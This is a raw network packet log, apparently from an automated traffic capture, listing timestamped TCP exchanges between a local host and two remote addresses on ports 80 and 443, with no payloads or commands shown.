Aug 10, 2024 16:12:23.671040058 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.671044111 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.671057940 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.671096087 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.671096087 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.671096087 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.671686888 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.671698093 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.671706915 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.671719074 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.671729088 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.671740055 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.671751976 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.671762943 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.671772957 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.671785116 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.671797037 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.671807051 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.671817064 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.671828032 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.671849012 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.671849012 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.671863079 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.685955048 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.685970068 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.686081886 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.686085939 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.686141014 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.686482906 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.686494112 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.686502934 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.686512947 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.686525106 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.686534882 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.686546087 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.686557055 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.686579943 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.686584949 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.686593056 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.686603069 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.686614037 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.686626911 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.686652899 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.686846018 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.686855078 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.686865091 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.686896086 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.686912060 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.687107086 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.687117100 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.687125921 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.687135935 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.687148094 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.687169075 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.687174082 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.687180042 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.687196016 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.687201977 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.687211037 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.687220097 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.687232018 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.687238932 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.687249899 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.687254906 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.687263966 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.687274933 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.687280893 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.687292099 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.687297106 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.687306881 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.687321901 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.687326908 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.687335968 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.687342882 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.687354088 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.687365055 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.687375069 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.687391043 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.687396049 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.687403917 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.687412977 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.687448978 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.687472105 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.687484980 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.687576056 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.687576056 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.687581062 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.687625885 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.688194990 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.688225031 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.688265085 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.688267946 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.688297987 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.688297987 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.688806057 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.688817024 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.688828945 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.688841105 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.688853979 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.688858986 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.688878059 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.688884020 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.688894033 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.688903093 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.688913107 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.688921928 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.688931942 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.688936949 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.688946962 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.688952923 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.688965082 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.688971996 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.688980103 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.688990116 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.688997030 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.689006090 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.689017057 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.689030886 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.689037085 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.689042091 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.689049959 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.689062119 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.689071894 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.689080000 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.689090014 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.689099073 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.689109087 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.689119101 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.689119101 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.689131975 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.689137936 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.689146042 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.689203024 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.689733982 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.689747095 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.689769030 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.689786911 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.689800024 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.689804077 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.689811945 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.689820051 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.689830065 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.689838886 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.689846039 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.689857006 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.689866066 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.689873934 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.689882994 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.689889908 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.689903975 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.689910889 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.689920902 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.689927101 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.689937115 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.689944029 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.689953089 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.689960957 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.689977884 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.690022945 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.690768957 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.690774918 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.690784931 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.690788984 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.690794945 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.690804005 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.690853119 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.690865993 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.690872908 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.690893888 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.690922976 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.690942049 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.690993071 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.690993071 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.690993071 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.690998077 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.691471100 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.691740036 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.691751003 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.691761017 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.691772938 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.691782951 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.691790104 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.691798925 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.691811085 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.691817999 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.691828012 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.691838980 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.691845894 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.691855907 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.691863060 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.691875935 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.691888094 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.691899061 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.691912889 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.691919088 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.691927910 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.691936016 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.691945076 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.691955090 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.691972017 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.691996098 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.692657948 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.692672014 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.692672014 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.692683935 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.692692041 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.692703009 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.692718983 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.692727089 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.692729950 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.692737103 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.692750931 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.692756891 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.692764997 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.692766905 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.692775965 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.692784071 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.692786932 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.692792892 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.692804098 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.692814112 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.692821026 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.692830086 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.692841053 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.692847013 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.692857027 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.692863941 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.692873001 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.692893028 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.692910910 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.693569899 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.693650007 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.693660975 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.693667889 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.693669081 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.693680048 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.693682909 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.693689108 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.693702936 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.693707943 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.693716049 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.693727970 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.693768978 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.693768978 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.693778992 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.693783998 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.693948984 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.722887039 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.722903967 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.722975016 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.722980022 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.723270893 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.758414984 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.758477926 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.758511066 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.758522034 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.758522034 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.758563042 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.758599997 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.758601904 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.758658886 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.758666039 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.758666039 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.758692980 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.758755922 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.758809090 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.758832932 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.758848906 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.758862972 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.758878946 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.758888960 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.758888960 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.758888960 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.758894920 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.758907080 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.758920908 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.758936882 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.758970976 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.758985996 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.759006023 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.759013891 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.759013891 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.759013891 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.759013891 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.759044886 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.759046078 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.759049892 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.759062052 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.759071112 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.759080887 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.759092093 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.759095907 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.759103060 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.759113073 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.759119987 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.759123087 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.759135962 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.759206057 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.759206057 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.759206057 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.759387016 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.759397030 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.759407997 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.759421110 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.759432077 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.759443045 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.759445906 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.759454012 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.759470940 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.759480953 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.759516954 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.759516954 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.759516954 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.759531021 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.759694099 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.759704113 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.759713888 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.759726048 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.759736061 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.759747028 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.759794950 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.759810925 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.759917974 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.759928942 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.759942055 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.759952068 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.759963036 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.759983063 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.760127068 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.760127068 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.760127068 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.760150909 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.760189056 CEST	80	49740	147.45.44.104	192.168.2.4
